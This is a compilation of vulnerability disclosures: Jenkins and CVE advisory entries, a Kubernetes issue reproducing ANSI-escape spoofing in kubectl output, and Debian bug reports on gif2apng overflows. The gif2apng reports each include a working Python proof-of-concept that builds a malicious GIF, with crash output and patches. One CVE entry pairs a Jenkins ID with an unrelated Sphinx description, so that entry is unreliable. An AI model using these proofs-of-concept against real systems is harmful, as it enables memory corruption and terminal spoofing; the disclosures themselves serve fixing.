*   **Metrics Plugin** should be updated to version 4.0.2.8.1
*   **SSH Agent Plugin** should be updated to version 1.23.2
*   **Warnings Next Generation Plugin** should be updated to version 9.10.3

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   batch task Plugin
*   Conjur Secrets Plugin
*   Debian Package Builder Plugin
*   Publish Over SSH Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-2033, SECURITY-2522 (1), SECURITY-2522 (2), SECURITY-2546
*   **Devin Nusbaum, CloudBees, Inc.** for SECURITY-2467
*   **James Nord, CloudBees, Inc.** for SECURITY-2141
*   **Jasen Minton** for SECURITY-2213
*   **Kevin Guerroudj** for SECURITY-2287
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2547
*   **Kevin Guerroudj, CloudBees, Inc. and Wadeck Follonier, CloudBees, Inc.** for SECURITY-2558
*   **Kevin Guerroudj, Justin Philip and Marc Heyries** for SECURITY-2307
*   **Marc Heyries, Justin Philip and Kevin Guerroudj** for SECURITY-2290, SECURITY-2291
*   **Matt Sicker, CloudBees, Inc.** for SECURITY-2163
*   **Oleg Nenashev** for SECURITY-1025
*   **Tomasz Szuba** for SECURITY-1878
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-2017, SECURITY-2090
*   **Wasin Saengow** for SECURITY-1624

CVE-2022-20616: Jenkins Security Advisory 2022-01-12

Jenkins Publish Over SSH Plugin 1.22 and earlier stores password unencrypted in its global configuration file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system.

CVE-2022-23114: Jenkins Security Advisory 2022-01-12

A missing permission check in Jenkins Mailer Plugin 391.ve4a_38c1b_cf4b_ and earlier allows attackers with Overall/Read access to use the DNS used by the Jenkins instance to resolve an attacker-specified hostname.

CVE-2022-20614: Jenkins Security Advisory 2022-01-12

SphinxSearch in Sphinx Technologies Sphinx through 3.1.1 allows directory traversal (in conjunction with CVE-2019-14511) because the mysql client can be used for CALL SNIPPETS and load_file operations on a full pathname (e.g., a file in the /etc directory). NOTE: this is unrelated to CMUSphinx.

**Name**

CVE-2020-29050

**Description**

SphinxSearch in Sphinx Technologies Sphinx through 3.1.1 allows direct ...

**Source**

CVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, Mageia, GitHub code/issues, web search, more)

**References**

DSA-5036-1

**Vulnerable and fixed packages**

The table below lists information on source packages.

Source Package

Release

Version

Status

sphinxsearch (PTS)

stretch

2.2.11-1.1

vulnerable

buster

2.2.11-2

vulnerable

buster (security)

2.2.11-2+deb10u1

fixed

bookworm, sid

2.2.11-8

fixed

The information below is based on the following data on fixed versions.

Package

Type

Release

Fixed Version

Urgency

Origin

Debian Bugs

sphinxsearch

source

buster

2.2.11-2+deb10u1

DSA-5036-1

sphinxsearch

source

(unstable)

2.2.11-3

**Notes**

Backported for sphinxsearch from: https://github.com/manticoresoftware/manticoresearch/commit/66b5761ad258c60b1866a8e1333f86e74f48035  
and https://github.com/manticoresoftware/manticoresearch/commit/6e597ff61e1e910559f6ed541ff32520085af6aa  
Backported patch: https://salsa.debian.org/debian/sphinxsearch/-/blob/4d6fe40644130308604845db43d3588e715ec85d/debian/patches/06-CVE-2020-29050.patch

CVE-2020-29050: CVE-2020-29050

kubectl does not neutralize escape, meta or control sequences contained in the raw data it outputs to a terminal. This includes but is not limited to the unstructured string fields in objects such as Events.

It is a security issue, but after contacting security@kubernetes.io, Tim and the team confirmed that they are comfortable posting it publicly.

**What happened:**

Kubernetes doesn't sanitize the 'message' field in the Event JSON objects.  
Notice that this is relevant only to JSON objects, not YAML objects.  
By creating new event, we can insert ANSI escape characters inside the "message" field, like:

    "\u001b[2J\u001b[3J\u001b[1;1H\u001b[m spoofed \u001b[60C\u001b[1;0m. Done"
    

This an example of such JSON request:

    {
        "apiVersion": "v1",
        "involvedObject": {
            "kind": "Node",
            "name": "node01",
            "uid": "node01"
        },
        "kind": "Event",
        "message": "\u001b[2J\u001b[3J\u001b[1;1H\u001b[m spoofed \u001b[60C\u001b[1;0m. Done",
        "metadata": {
            "name": "spoofEvent",
            "namespace": "default"
        },
        "source": {
            "component": "kubelet",
            "host": "node01"
        },
        "type": "Normal"
    }
    

The codes:  
`\u001b[2J` -> Clean the screen and history  
`\u001b[3J` -> Clean the entire screen and delete all lines saved in the scrollback buffer  
`\u001b[1;1H` -> Moves the cursor position to row 1, column 1 (beginning).  
`\u001b[m` -> Set the colors  
`\u001b[60C` -> Move the cursor forward 60 steps  
`\u001b[1;1m` -> Set the text colors to white

The result is that the text was spoofed, and we could spoof the events, create hidden events, or hide other events.

**What you expected to happen:**

The ANSI escape characters will be filtered so they couldn't affect the terminal (i.e. using embeded ANSI colors won't do anything to the terminal).  
Or maybe some message that says that you can't use ANSI escape characters.

**How to reproduce it (as minimally and precisely as possible):**

1.  Run this code:

    
    kubectl create -f - <<EOF
    {
        "apiVersion": "v1",
        "involvedObject": {
            "kind": "Node",
            "name": "node01",
            "uid": "node01"
        },
        "kind": "Event",
        "message": "\u001b[2J\u001b[3J\u001b[1;1H\u001b[m spoofed \u001b[60C\u001b[1;0m. Done",
        "metadata": {
            "name": "spoofEvent",
            "namespace": "default"
        },
        "source": {
            "component": "kubelet",
            "host": "node01"
        },
        "type": "Normal"
    }
    EOF
    

It will create a new event.

2.  Run `kubectl get events`, you will see that the screen was clear, you will get a "spoof" message, and all the rest events or columns were gone.

**Anything else we need to know?:**

It might look like a low severity issue, but there are other variety of things we can do, from DoS by using colors to hide all the events, changing the title of the terminal window, and spoof the data.

It can affect other systems that are using Kubernetes events, such as monitoring applications. It doesn't have to be only the Kubernetes events. There might be other vulnerable objects that we didn't find or other systems that create new objects that count on this mechanism.

ANSI escape characters were used to abuse terminals emulators and even cause code execution if the terminal is vulnerable (like CVE-2003-0069).

**Environment:**

*   Kubernetes version (use `kubectl version`):

    Client Version: version.Info{Major:"1", Minor:"20", GitVersion:"v1.20.4", GitCommit:"e87da0bd6e03ec3fea7933c4b5263d151aafd07c", GitTreeState:"clean", BuildDate:"2021-02-18T16:12:00Z", GoVersion:"go1.15.8", Compiler:"gc", Platform:"linux/amd64"}
    Server Version: version.Info{Major:"1", Minor:"20", GitVersion:"v1.20.2", GitCommit:"faecb196815e248d3ecfb03c680a4507229c2a56", GitTreeState:"clean", BuildDate:"2021-01-13T13:20:00Z", GoVersion:"go1.15.5", Compiler:"gc", Platform:"linux/amd64"}
    

*   Cloud provider or hardware configuration:
*   OS (e.g: `cat /etc/os-release`):

    NAME="Ubuntu"
    VERSION="16.04.7 LTS (Xenial Xerus)"
    ID=ubuntu
    ID_LIKE=debian
    PRETTY_NAME="Ubuntu 16.04.7 LTS"
    VERSION_ID="16.04"
    HOME_URL="http://www.ubuntu.com/"
    SUPPORT_URL="http://help.ubuntu.com/"
    BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
    VERSION_CODENAME=xenial
    UBUNTU_CODENAME=xenial
    

*   Kernel (e.g. `uname -a`):

    Linux manager1 4.15.0-140-generic #144~16.04.1-Ubuntu SMP Fri Mar 19 21:24:12 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
    

*   Install tools: minikube

    minikube version: v1.19.0
    commit: 15cede53bdc5fe242228853e737333b09d4336b5
    

*   Network plugin and version (if this is a network-related bug):
*   Others: we also reproduced it in Kubernetes (not minikube) version 1.18

CVE-2021-25743: ANSI escape characters in kubectl output are not being filtered · Issue #101695 · kubernetes/kubernetes

An issue was discovered in gif2apng 1.9. There is a heap-based buffer overflow in the main function. It allows an attacker to write 2 bytes outside the boundaries of the buffer.

![version graph](https://bugs.debian.org/cgi-bin/version.cgi?height=2;found=gif2apng%2F1.9%2Bsrconly-3;absolute=0;collapse=1;package=gif2apng;width=2)

Reply or subscribe to this bug.

Toggle useless messages

**Report forwarded** to `debian-bugs-dist@lists.debian.org, Debian QA Group <packages@qa.debian.org>`:  
`Bug#1002687`; Package `gif2apng`. (Mon, 27 Dec 2021 11:48:04 GMT) (full text, mbox, link).

**Acknowledgement sent** to `Kolja Grassmann <koljagrassmann@mailbox.org>`:  
New Bug report received and forwarded. Copy sent to `Debian QA Group <packages@qa.debian.org>`. (Mon, 27 Dec 2021 11:48:04 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security

Dear Maintainer,

There is a heap based buffer overflow in the main function of the gif2apng application. The responsible code looks as follows:

    delays = (unsigned short \*)malloc(frames\*2);
    if (delays == NULL)
      return 1;
\[...\]
          if (val == 0xF9)
          {
            if (fread(&size, 1, 1, f1) != 1) return 1;
            if (fread(&flags, 1, 1, f1) != 1) return 1;
            if (fread(&delay, 2, 1, f1) != 1) return 1;
            if (fread(&t, 1, 1, f1) != 1) return 1;
            if (fread(&end, 1, 1, f1) != 1) return 1;
            has\_t = flags & 1;
            dispose\_op = (flags >> 2) & 7;
            if (dispose\_op > 3) dispose\_op = 3;
            if (dispose\_op == 3 && n == 0) dispose\_op = 2;
            if (delay > 1) delays\[n\] = delay;
          }

The variable n is used to count the frames. The problem is that if we enter the if statement at the very end of the gif file, then n is equal to frames. This means, that the write to the delays buffer overwrites the two bytes after the delays buffer.

The following script generates a poc.gif file, that should cause a crash:

#!/bin/python3

# Writing to poc.gif
f = open("poc.gif", "wb")

sig = b"GIF87a"
w = b"\\x10\\x00"
h = b"\\x10\\x00"
flags\_one = b"\\x00"
bcolor = b"\\x01"
aspect = b"\\x01"

data = sig + w + h + flags\_one + bcolor + aspect
f.write(data)

# Writting more frames to produce crash:
for i in range(0,28):
    # Going into the id 0x2c path, so that there is a frame
    id = b"\\x2c"
    w0 = b"\\x01\\x00"
    y0 = b"\\x00\\x00"
    x0 = b"\\x00\\x00"
    h0 = b"\\x01\\x00" # Getting past our own size checks
    flags\_two = b"\\x00"

    data = id + x0 + y0 + w0 + h0 + flags\_two
    f.write(data)

    # DecodeLZW
    mincode = b"\\x07"
    f.write(mincode)
    for i in range(0,512):
        # Size value and byte we write to the heap
        target\_char = b"\\x01" + b"A"
        f.write(target\_char)
        # Resetting the values using "clearcode" to keep the code path as simple as possible
        clear\_code = b"\\x01" + b"\\x80"
        f.write(clear\_code)
    # Leaving function
    target\_char = b"\\x00"
    f.write(target\_char)

# Triggering the vulnerable code path
id = b"\\x21"
val = b"\\xf9"
size = b"\\xff"
flags\_two = b"\\x00"
delay = b"\\xff\\xff"
t = b"\\x00"
end = b"\\x00"

data = id + val + size + flags\_two + delay + t + end
f.write(data)

# Breaking out of while loop
f.write(b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")

f.close()

The generated poc.gif file causes a memory curruption on the heap when converted with the current gif2apng version:
$ gif2apng -i0 poc.gif /dev/null

gif2apng 1.9 using ZLIB

Reading 'poc.gif'...
28 frames.
Writing 'poc.png'...
28 frames.
munmap\_chunk(): invalid pointer
Abgebrochen


This buffer overflow allows an attacker to write two arbitrary bytes after the delays buffer.

I did a rudimentary fix in my local version of the program by adding a boundary check to the if statement in the code:
          if (val == 0xF9)
          {
            if (fread(&size, 1, 1, f1) != 1) return 1;
            if (fread(&flags, 1, 1, f1) != 1) return 1;
            if (fread(&delay, 2, 1, f1) != 1) return 1;
            if (fread(&t, 1, 1, f1) != 1) return 1;
            if (fread(&end, 1, 1, f1) != 1) return 1;
            has\_t = flags & 1;
            dispose\_op = (flags >> 2) & 7;
            if (dispose\_op > 3) dispose\_op = 3;
            if (dispose\_op == 3 && n == 0) dispose\_op = 2;
            if (delay > 1 && n < frames) {
              delays\[n\] = delay;
            }
          }

This fixed the crash for me locally. However I am not sure if this is a clean solution as I have no idea if this can happen in a valid image. If this code path is not possible in a valid image it might be better to stop processing the image at this point.

Best regards
Kolja



-- System Information:
Debian Release: 10.11
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86\_64)

Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT\_OOT\_MODULE, TAINT\_UNSIGNED\_MODULE
Locale: LANG=de\_DE.UTF-8, LC\_CTYPE=de\_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de\_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages gif2apng depends on:
ii  libc6       2.28-10
ii  libzopfli1  1.0.2-1
ii  zlib1g      1:1.2.11.dfsg-1

gif2apng recommends no packages.

Versions of packages gif2apng suggests:
pn  apng2gif  <none>

-- no debconf information

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org\>. Last modified: Tue Dec 28 01:30:08 2021; Machine Name: bembo

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

CVE-2021-45911: #1002687 - gif2apng: Heap based buffer overflow in processing of delays in the main function

An issue was discovered in gif2apng 1.9. There is a stack-based buffer overflow involving a while loop. An attacker has little influence over the data written to the stack, making it unlikely that the flow of control can be subverted.

![version graph](https://bugs.debian.org/cgi-bin/version.cgi?absolute=0;package=gif2apng;height=2;width=2;collapse=1;found=gif2apng%2F1.9%2Bsrconly-3)

Reply or subscribe to this bug.

Toggle useless messages

**Report forwarded** to `debian-bugs-dist@lists.debian.org, Debian QA Group <packages@qa.debian.org>`:  
`Bug#1002669`; Package `gif2apng`. (Sun, 26 Dec 2021 23:15:04 GMT) (full text, mbox, link).

**Acknowledgement sent** to `Kolja Grassmann <koljagrassmann@mailbox.org>`:  
New Bug report received and forwarded. Copy sent to `Debian QA Group <packages@qa.debian.org>`. (Sun, 26 Dec 2021 23:15:04 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

Package: gif2apng
Version: 1.9+srconly-3
Severity: normal
Tags: security

Dear Maintainer,

There are two stack based buffer overflows in the gif2apng application. The responsible code is located in the DecodeLZW function and looks as follows:

void DecodeLZW(unsigned char \* img, unsigned int img\_size, FILE \* f1) // added
parameter img\_size
{
  int i, bits, codesize, codemask, clearcode, nextcode, lastcode;
  unsigned int   j;
  unsigned int   size = 0;
  unsigned int   accum = 0;
  unsigned short prefix\[4097\];
  unsigned char  suffix\[4097\];
  unsigned char  str\[4097\];
  unsigned char  data\[1024\];
  unsigned char  firstchar = 0;
  unsigned char \*pstr = str;
  unsigned char \*pout = img;
  unsigned char  mincodesize;

  if (fread(&mincodesize, 1, 1, f1) != 1) return;

  bits = 0;
  codesize = mincodesize + 1;
  codemask = (1 << codesize) - 1;
  clearcode = 1 << mincodesize;
  nextcode = clearcode + 2;
  lastcode = -1;

  for (i=0; i<clearcode; i++)
    suffix\[i\] = i;
\[...\]
        while (code >= clearcode)
        {
          \*pstr++ = suffix\[code\];
          code = prefix\[code\];
        }

In both loops at the end it is possible to write over the boundaries of the buffer by providing certain values a part of the gif file. For the for loop we can provide a large value for mincodesize leading to a clearcode bigger than 4097 and therefore overflowing the buffer. In the while loop we can provide code values, that repeat so that prefix\[code\] results in the same code again.

I wrote the following script to generate a poc.gif file:

#!/bin/python3

# Writing to poc.gif
f = open("poc.gif", "wb")
# Data needed to enter the code path:
beginning = b"GIF87a" + b"\\x10\\x00\\x10\\x00" + b"\\x01" \* 3 + b"\\x2c" + b"\\x01" \*
9
f.write(beginning)


mincode = b"\\x07"
# Uncomment the following line to trigger the other crash
# mincode = b"\\x10"
f.write(mincode)

# Size value and byte we write to the heap
target\_char = b"\\x01" + b"\\xff\\xfe"\*10000
f.write(target\_char)

f.close()

The poc.gif file generated by the script does trigger the overflow in the while loop. If the other value for mincode is used it should trigger the overflow in the for loop. Using the poc.gif file as follows led to a segmentation fault:
$ gif2apng -i0 poc.gif /dev/null

gif2apng 1.9 using ZLIB

Reading 'poc.gif'...
Speicherzugriffsfehler

As I see no way to control the data, that is written in the loops I do not think, that this can necessarily exploited to gain code execution.

I fixed the issue locally by introducing a variable, that keeps track of the amount of data written to the pstr pointer and by doing some boundary checks before writing to the buffers:

if (clearcode > 4097) { // Added to avoid stack overflow here
    printf("Invalid Image\\n");
    exit(0);
  }
  for (i=0; i<clearcode; i++)
    suffix\[i\] = i;
\[...\]
        if (code >= nextcode)
        {
          if ( write\_counter <= 4097) { // Added to fix stack overflow here
            \*pstr++ = firstchar;
            write\_counter++;
            code = lastcode;
          }
          else {
            printf("Invalid Image\\n");
            exit(0);
          }
        }

        while (code >= clearcode)
        {
          if ( write\_counter <= 4097) { // Added to fix stack overflow here
            \*pstr++ = suffix\[code\];
            write\_counter++;
            code = prefix\[code\];
          }
          else {
            printf("Invalid Image\\n");
            exit(0);
          }
        }
        if ( write\_counter <= 4097) { // Added to fix stack overflow here
          \*pstr++ = firstchar = suffix\[code\];
          write\_counter++;
        }
        else {
          printf("Invalid Image\\n");
          exit(0);
        }

This seemed to fix the issue for me locally, but it could use some more testing.

Best regards
Kolja





-- System Information:
Debian Release: 10.11
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86\_64)

Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT\_OOT\_MODULE, TAINT\_UNSIGNED\_MODULE
Locale: LANG=de\_DE.UTF-8, LC\_CTYPE=de\_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de\_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages gif2apng depends on:
ii  libc6       2.28-10
ii  libzopfli1  1.0.2-1
ii  zlib1g      1:1.2.11.dfsg-1

gif2apng recommends no packages.

Versions of packages gif2apng suggests:
pn  apng2gif  <none>

-- no debconf information

**Added tag(s) upstream.** Request was from `Salvatore Bonaccorso <carnil@debian.org>` to `control@bugs.debian.org`. (Sun, 26 Dec 2021 23:21:10 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org\>. Last modified: Tue Dec 28 01:30:18 2021; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

CVE-2021-45908: #1002669 - gif2apng: Two stack based buffer overflows in the DecodeLZW function

An issue was discovered in gif2apng 1.9. There is a heap-based buffer overflow within the main function. It allows an attacker to write data outside of the allocated buffer. The attacker has control over a part of the address that data is written to, control over the written data, and (to some extent) control over the amount of data that is written.

**Debian Bug report logs - #1002667  
gif2apng: Heap based buffer overflow in the main function**

![version graph](https://bugs.debian.org/cgi-bin/version.cgi?found=gif2apng%2F1.9%2Bsrconly-3;height=2;collapse=1;width=2;absolute=0;package=gif2apng)

Reply or subscribe to this bug.

Toggle useless messages

**Report forwarded** to `debian-bugs-dist@lists.debian.org, Debian QA Group <packages@qa.debian.org>`:  
`Bug#1002667`; Package `gif2apng`. (Sun, 26 Dec 2021 22:48:03 GMT) (full text, mbox, link).

**Acknowledgement sent** to `Kolja Grassmann <koljagrassmann@mailbox.org>`:  
New Bug report received and forwarded. Copy sent to `Debian QA Group <packages@qa.debian.org>`. (Sun, 26 Dec 2021 22:48:04 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security

Dear Maintainer,

I found a heap overflow in the main function of the gif2apng application. The issue exists within the for loops in the following code from the main function in gif2apng.cpp:

          if (coltype == 2)
          {
            for (j=0; j<h0; j++)
            {
              k = j; if (interlaced) k = (j>h2) ? (j-h2)\*2-1 : (j>h2/2) ? (j-h2/2)\*4-2 : (j>h2/4) ? (j-h2/4)\*8-4 : j\*8;
              src = buffer + j\*w0;
              dst = frame0 + ((k+y0)\*w + x0)\*3;
              for (i=0; i<w0; i++, src++, dst+=3)
                if (!has\_t || \*src != t)
                  memcpy(dst, &pal\_l\[\*src\]\[0\], 3);
            }
          }
          else
          {
            for (j=0; j<h0; j++)
            {
              k = j; if (interlaced) k = (j>h2) ? (j-h2)\*2-1 : (j>h2/2) ? (j-h2/2)\*4-2 : (j>h2/4) ? (j-h2/4)\*8-4 : j\*8;
              src = buffer + j\*w0;
              dst = frame0 + (k+y0)\*w + x0;
              if (shuffle)
              {
                for (i=0; i<w0; i++, src++, dst++)
                  if (!has\_t || \*src != t)
                    \*dst = sh\[\*src\];
              }
              else
              {
                for (i=0; i<w0; i++, src++, dst++)
                  if (!has\_t || \*src != t)
                    \*dst = \*src;
              }
            }
          }

The variable frame0 points to a buffer of size w \* h \* 3 or size w \* h depending on the code path. The buffer variable points to a buffer holding user controllable data from the provided gif file. The variables w0, h0, x0 and y0 are also read from the gif file provided to the program without any validation. By choosing these values in the right way it is possible to manipulate the address, that data is written to as well as the number of bytes that are copied to the destination.

I wrote the following poc script, which creates a poc.gif file:

#!/bin/python3

# Writing to poc.gif
f = open("poc.gif", "wb")

sig = b"GIF87a"
w = b"\\x10\\x00"
h = b"\\x10\\x00"
flags\_one = b"\\x00"
bcolor = b"\\x01"
aspect = b"\\x01"

data = sig + w + h + flags\_one + bcolor + aspect
f.write(data)

id = b"\\x2c"
w0 = b"\\xff\\x00"
y0 = b"\\x00\\x00"
x0 = b"\\xff\\x00"
h0 = b"\\x02\\x00"
flags\_two = b"\\x00"

data = id + x0 + y0 + w0 + h0 + flags\_two
f.write(data)

# DecodeLZW
mincode = b"\\x07"
f.write(mincode)
for i in range(0,512):
    # Size value and byte we write to the buffer
    target\_char = b"\\x01" + b"A"
    f.write(target\_char)
    # Resetting the values using "clearcode" to keep the code path as simple as
possible
    clear\_code = b"\\x01" + b"\\x80"
    f.write(clear\_code)
# Leaving function
target\_char = b"\\x00"
f.write(target\_char)

f.write(b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")

f.close()

Executing the following on the package from the testing repository on Debian 10 lead to a memory corruption issue:
user@debian:~$ gif2apng -i0 poc.gif /dev/null

gif2apng 1.9 using ZLIB

Reading 'poc.gif'...
1 frames.
Writing 'poc.png'...
1 frames.
double free or corruption (out)
Abgebrochen

I have not looked into exploiting this bug. However as it allows us to write arbitrary data to an address outside of the intended buffer and as we have control over parts of the address as well as the data that is written, this could in my opinion be exploitable.

I did a rudimentary fix for this issue locally by doing a bounds check before entering the for loops. However I am not sure if this is the cleanest solution, as this does only adresses the buffer overflow and not the lack of sanity
checks performed on the image data. It could also use some more testing.

          if (coltype == 2)
          {
            for (j=0; j<h0; j++)
            {
              k = j; if (interlaced) k = (j>h2) ? (j-h2)\*2-1 : (j>h2/2) ?
(j-h2/2)\*4-2 : (j>h2/4) ? (j-h2/4)\*8-4 : j\*8;
              src = buffer + j\*w0;
              dst = frame0 + ((k+y0)\*w + x0)\*3;
              if ( ( (j\*w0 + w0) > buffer\_size) || ( ((((k+y0)\*w + x0)\*3) + w0
\* 3 ) > imagesize) ||  ((((k+y0)\*w + x0)\*3) < 0 ) ||  ( (j\*w0) < 0)) {
                printf("Something is wrong with the size values\\n");
                exit(0);
              }
              for (i=0; i<w0; i++, src++, dst+=3)
                if (!has\_t || \*src != t)
                  memcpy(dst, &pal\_l\[\*src\]\[0\], 3);
            }
          }
          else
          {
            for (j=0; j<h0; j++)
            {
              k = j; if (interlaced) k = (j>h2) ? (j-h2)\*2-1 : (j>h2/2) ?
(j-h2/2)\*4-2 : (j>h2/4) ? (j-h2/4)\*8-4 : j\*8;
              src = buffer + j\*w0;
              dst = frame0 + (k+y0)\*w + x0;
              if ( ( (j\*w0 + w0) > buffer\_size) || ( (((k+y0)\*w + x0) + w0 ) >
imagesize) ||  ((((k+y0)\*w + x0)) < 0 ) ||  ( (j\*w0) < 0)) {
                printf("Something is wrong with the size values\\n");
                exit(0);
              }
              if (shuffle)
              {
                for (i=0; i<w0; i++, src++, dst++)
                  if (!has\_t || \*src != t)
                    \*dst = sh\[\*src\];
              }
              else
              {
                for (i=0; i<w0; i++, src++, dst++)
                  if (!has\_t || \*src != t)
                    \*dst = \*src;
              }
            }
          }


Best regards
Kolja




-- System Information:
Debian Release: 10.11
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86\_64)

Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT\_OOT\_MODULE, TAINT\_UNSIGNED\_MODULE
Locale: LANG=de\_DE.UTF-8, LC\_CTYPE=de\_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de\_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages gif2apng depends on:
ii  libc6       2.28-10
ii  libzopfli1  1.0.2-1
ii  zlib1g      1:1.2.11.dfsg-1

gif2apng recommends no packages.

Versions of packages gif2apng suggests:
pn  apng2gif  <none>

-- no debconf information

**Added tag(s) upstream.** Request was from `Salvatore Bonaccorso <carnil@debian.org>` to `control@bugs.debian.org`. (Sun, 26 Dec 2021 23:03:07 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org\>. Last modified: Tue Dec 28 01:30:11 2021; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

CVE-2021-45910: #1002667 - gif2apng: Heap based buffer overflow in the main function

An issue was discovered in gif2apng 1.9. There is a heap-based buffer overflow vulnerability in the DecodeLZW function. It allows an attacker to write a large amount of arbitrary data outside the boundaries of a buffer.

![version graph](https://bugs.debian.org/cgi-bin/version.cgi?collapse=1;width=2;absolute=0;package=gif2apng;found=gif2apng%2F1.9%2Bsrconly-3;height=2)

Reply or subscribe to this bug.

Toggle useless messages

**Report forwarded** to `debian-bugs-dist@lists.debian.org, Debian QA Group <packages@qa.debian.org>`:  
`Bug#1002668`; Package `gif2apng`. (Sun, 26 Dec 2021 23:00:04 GMT) (full text, mbox, link).

**Acknowledgement sent** to `Kolja Grassmann <koljagrassmann@mailbox.org>`:  
New Bug report received and forwarded. Copy sent to `Debian QA Group <packages@qa.debian.org>`. (Sun, 26 Dec 2021 23:00:04 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security

Dear Maintainer,

There is a heap based buffer overflow in the gif2apng package. The vulnerability is located in the DecodeLZW function in the gif2apng.cpp file. The problem here is, that this function writes to a buffer, that was allocated using malloc without checking the size of this buffer. Therefore it is possible to provide a gif to the program, that contains more data than fits into this buffer leading to a memory corruption on the heap. I wrote the following poc script in python:

#!/bin/python3

# Writing to poc.gif
f = open("poc.gif", "wb")
# Data needed to enter the code path:
beginning = b"GIF87a" + b"\\x10\\x00\\x10\\x00" + b"\\x01" \* 3 + b"\\x2c" + b"\\x01" \*
9
f.write(beginning)

# Value needed in the vulnerable function
mincode = b"\\x07"
f.write(mincode)
for i in range(0,10000):
      # Size value and byte we write to the heap
      target\_char = b"\\x01" + b"A"
      f.write(target\_char)
      # Resetting the values using "clearcode" to keep the code path as simple
as possible
      clear\_code = b"\\x01" + b"\\x80"
      f.write(clear\_code)

f.close()

This script creates a file called poc.gif, which writes 10000 "A"'s into a buffer of size 512 leading to memory corruption on the heap. I tested this on Debian 10 using the current version of the package from the testing repository and got the following output:
$ gif2apng -i0 poc.gif /dev/null

gif2apng 1.9 using ZLIB

Reading 'poc.gif'...
1 frames.
malloc(): corrupted top size
Abgebrochen

This vulnerability seems to allow a write of an arbitrary number of arbitrary bytes. Therefore I think it likely, that this could be exploited.

To fix this issue locally I added a buffer\_size variable to the main function, which holds the size of the allocated buffer (the imagesize value used initially for the allocation was overwritten at some point). I then passed this value to the DecodeLZW function and added two if-statements around the writes to the the buffer to check whether the buffer can hold more bytes. My code looks as follows:

void DecodeLZW(unsigned char \* img, unsigned int img\_size, FILE \* f1) // added
parameter img\_size
{
      unsigned int bytes\_written = 0;
\[...\]
            if (lastcode == -1)
            {
               if (bytes\_written < img\_size) { // Added if-statement
                  \*pout++ = suffix\[code\];
                  bytes\_written++;
               }
               else {
                  printf("Invalid image size\\n");
                  exit(0);
               }
               firstchar = lastcode = code;
               continue;
            }
\[...\]
            do
            {
               if (bytes\_written < img\_size) { // Added if-statement
                  \*pout++ = \*--pstr;
                  bytes\_written++;
               }
               else {
                  printf("Invalid image size\\n");
                  exit(0);
               }
            }
            while (pstr >  str);
\[...\]
int main(int argc, char\*\* argv)
{
   unsigned int       buffer\_size = 0; // New variable to hold the size of the
buffer
\[...\]
      grayscale = 1;

      buffer\_size = imagesize\*2; // New variable, as imagesize is overwritten
at some point
      buffer = (unsigned char \*)malloc(buffer\_size);
      if (buffer == NULL)
      {
         printf("Error: not enough memory\\n");
         return 1;
      }
\[...\]
